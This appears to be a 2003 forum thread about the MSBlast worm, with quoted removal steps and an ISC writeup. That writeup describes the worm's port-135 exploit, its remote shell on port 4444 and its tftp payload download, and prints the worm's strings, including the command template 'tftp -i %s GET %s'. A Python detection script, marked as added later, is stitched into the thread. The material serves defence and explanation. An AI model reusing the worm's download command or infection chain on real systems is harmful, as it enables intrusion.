I thought that you couldn't get a virus or a worm unless you executed the file? Can someone clear this up for me?
This worm, scans other ip addresses for the RPC exploit that came out recently. When it finds a box that it can exploit...it opens a shell on the remote host and then using that shell downloads a file to the hacked computer. It then launches that program and adds it to the registry so it starts again on reboot.
Basically the worm hacks the box and installs itself on that box.
another thing about msblast.exe taken from www.mess.be
PeacE
Quote:
D'z warned me about a hole in the MSN Messenger protocol that has lately been taken advantage of. It's the first thing I hear about it, but according to him "several people have already been hit by exploiters, gaining too much access".
To find out whether you're infected, press Ctrl+Alt+Del and verify if the process 'MsBlast.exe' is running. If it is, consider following the instructions below, but since there is no official security bulletin released on this topic yet... you are on your own.
- Kill the process MsBlast.exe from the task manager you just checked.
- Next, execute regedit.exe and search for the registry key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Windows Auto Update
If it mentions MSBLAST in the path, remove that.
- Final step: delete msblast.exe from either the windows system or system32 folder.
-BoB
Man... that's like... amazing... I didn't think a program could hack a computer by itself! But to get a "virus" (not a worm, a virus) someone has to actually start the file, right?
Worms spread on their own and don't require human intervention. That is what makes them a worm.
Grinler
I can't remove it! Someone help!
Massive increase in scanning on port 135, about one scan every 10 seconds.
Internet Storm Center have posted a Yellow Alert, text of which follows.
Scanning is done Code Red style, concentrating on the pseudo-class B subnet that the infected host is in, i.e. the 65,536 hosts in 123.123.x.x.
This will most likely cause RPC and svchost failures in unprotected machines.
See: ISC Handlers Diary
Slashdot
Quote:
Updated August 11th 2003 17:59 EDT
RPC DCOM WORM (MSBLASTER)
This RPC DCOM worm started spreading early afternoon EDT (evening UTC). At this point, it is spreading rapidly.
**********
NOTE: PRELIMINARY. Do not base your incident response solely on this writeup.
**********
Increase in port 135 activity: http://isc.sans.org/images/port135percent.png
In order to protect yourself, you need to:
Close port 135 (if possible 135-139, 445 and 593)
Apply Patches http://www.microsoft.com/technet/sec...n/MS03-026.asp
If you are infected:
- disconnect machine from any network
- delete msblast.exe
- delete registry key starting msblast.exe
- reboot.
The worm may launch a syn flood against windowsupdate.com on the 16th. It has the ability to infect Windows 2000 and XP.
The worm uses the RPC DCOM vulnerability to propagate. Once it finds a vulnerable system, it will spawn a shell on port 4444 and use it to download the actual worm via tftp. The exploit itself is very close to 'dcom.c' and so far appears to use the "universal Win2k" offset only.
Infection sequence:
1. SOURCE sends packets to port 135 tcp with variation of dcom.c exploit to TARGET
2. this causes a remote shell on port 4444 at the TARGET
3. the SOURCE now sends the tftp get command to the TARGET, using the shell on port 4444
4. the target will now connect to the tftp server at the SOURCE.
The name of the binary is msblast.exe. It is packed with UPX and will self extract. The size of the binary is about 11kByte unpacked, and 6kBytes packed:
MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)
So far we found the following properties:
- Scans sequentially for machines with open port 135, starting at a presumably random IP address
- uses multiple TFTP servers to pull the binary
- adds a registry key to start itself after reboot
Name of registry key:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, name: 'windows auto update'
Strings of interest:
msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
windowsupdate.com
start %s
tftp -i %s GET %s
%d.%d.%d.%d
%i.%i.%i.%i
BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Existing RPC DCOM snort signatures will detect this worm. The worm is based on dcom.c
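The scan phase and the four-step infection sequence in the writeup above, turned into a defender's detection pass over connection-log lines (example code added to this thread, not ISC's or any vendor's tool; the log format, the 60-second correlation window and the sample addresses are assumptions, and the traffic is constructed):

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format: "<date> <time> <TCP|UDP> <src>:<sport> -> <dst>:<dport>"
LOG_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<proto>TCP|UDP) (?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+)$")
WINDOW = timedelta(seconds=60)  # assumption: the three steps complete within a minute

def parse(line):
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), "proto": m["proto"],
            "src": m["src"], "dst": m["dst"], "dport": int(m["dport"])}

def port135_scanners(lines, min_targets=3):
    """Sources that probed TCP/135 on at least min_targets distinct hosts (scan phase)."""
    targets = defaultdict(set)
    for e in filter(None, map(parse, lines)):
        if e["proto"] == "TCP" and e["dport"] == 135:
            targets[e["src"]].add(e["dst"])
    return sorted(s for s, t in targets.items() if len(t) >= min_targets)

def infections(lines):
    """(source, target) pairs whose traffic matches 135 -> 4444 -> tftp back to source."""
    stage, hits = {}, []  # stage: (src, dst) -> (step reached, time of that step)
    for e in sorted((e for e in map(parse, lines) if e), key=lambda e: e["ts"]):
        key, t = (e["src"], e["dst"]), e["ts"]
        if e["proto"] == "TCP" and e["dport"] == 135:
            stage[key] = (1, t)
        elif e["proto"] == "TCP" and e["dport"] == 4444:
            if stage.get(key, (0, t))[0] == 1 and t - stage[key][1] <= WINDOW:
                stage[key] = (2, t)  # shell contacted after the exploit
        elif e["proto"] == "UDP" and e["dport"] == 69:
            rev = (e["dst"], e["src"])  # the tftp GET runs from TARGET back to SOURCE
            if stage.get(rev, (0, t))[0] == 2 and t - stage[rev][1] <= WINDOW:
                hits.append(rev)
                del stage[rev]
    return hits

SAMPLE_LOG = [  # constructed sample traffic, not a real capture
    "2003-08-11 14:00:01 TCP 10.0.0.5:1034 -> 10.0.0.9:135",
    "2003-08-11 14:00:02 TCP 10.0.0.5:1035 -> 10.0.0.9:4444",
    "2003-08-11 14:00:03 UDP 10.0.0.9:1025 -> 10.0.0.5:69",
    "2003-08-11 14:00:11 TCP 10.0.0.5:1036 -> 10.0.0.10:135",
    "2003-08-11 14:00:21 TCP 10.0.0.5:1037 -> 10.0.0.11:135",
    "2003-08-11 14:01:00 TCP 10.0.0.7:1040 -> 10.0.0.9:135",  # lone probe, no follow-up
    "2003-08-11 14:02:00 UDP 10.0.0.3:1026 -> 10.0.0.8:69",  # unrelated tftp transfer
]
```

A lone port-135 probe or a stand-alone tftp transfer is not reported; only the full exploit-shell-download chain from one source to one target counts as an infection.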
Ok.. this is great..
The initial info I have is about what the worm does.. How are people receiving it?
Thanks Grinler, the info from Symantec is useless (too early for me to check the others)
Quote:
This worm, scans other ip addresses for the RPC exploit that came out recently. When it finds a box that it can exploit...it opens a shell on the remote host and then using that shell downloads a file to the hacked computer. It then launches that program and adds it to the registry so it starts again on reboot.
Basically the worm hacks the box and installs itself on that box.
Cheers
I tried to scan my computer but it didn't find anything.
Found a bit more info here
Does this help?